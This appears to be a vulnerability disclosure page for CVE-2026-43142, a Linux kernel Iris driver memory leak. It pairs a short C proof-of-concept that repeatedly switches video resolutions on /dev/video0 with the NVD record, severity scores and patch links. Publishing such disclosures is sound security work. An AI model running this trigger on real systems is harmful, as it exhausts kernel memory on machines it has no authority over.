CVE-2026-43142

/* * PoC for CVE-2026-43142: Linux Kernel Iris Driver Memory Leak * This PoC attempts to trigger the memory leak by repeatedly changing * the resolution/format of the video device. * Compilation: gcc -o poc_leak poc_leak.c */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/videodev2.h> #define DEVICE "/dev/video0" // Assuming iris driver is registered here #define ITERATIONS 10000 int main() { int fd = -1; struct v4l2_format fmt; int i; fd = open(DEVICE, O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } printf("Starting resolution change loop to trigger leak...\n"); for (i = 0; i < ITERATIONS; i++) { // Toggle between two resolutions to force buffer reallocation // Resolution A fmt.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE; fmt.fmt.pix_mp.width = 1920; fmt.fmt.pix_mp.height = 1080; fmt.fmt.pix_mp.pixelformat = V4L2_PIX_FMT_NV12; ioctl(fd, VIDIOC_S_FMT, &fmt); // Resolution B fmt.fmt.pix_mp.width = 1280; fmt.fmt.pix_mp.height = 720; ioctl(fd, VIDIOC_S_FMT, &fmt); if (i % 100 == 0) { printf("Iteration %d\n", i); } } close(fd); printf("PoC execution completed. Check kernel memory usage.\n"); return 0; }

{"cve": {"id": "CVE-2026-43142", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:31.633", "lastModified": "2026-05-13T18:41:13.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: gen1: Destroy internal buffers after FW releases\n\nAfter the firmware releases internal buffers, the driver was not\ndestroying them. This left stale allocations that were no longer used,\nespecially across resolution changes where new buffers are allocated per\nthe updated requirements. As a result, memory was wasted until session\nclose.\n\nDestroy internal buffers once the release response is received from the\nfirmware."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1dabf00ee206eceb0f08a1fe5d1ce635f9064338", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cde76db8883ec8a3d1456068079ecadbfb15ca5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d4457f23ac0130240053a34be663f0fade3bb371", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}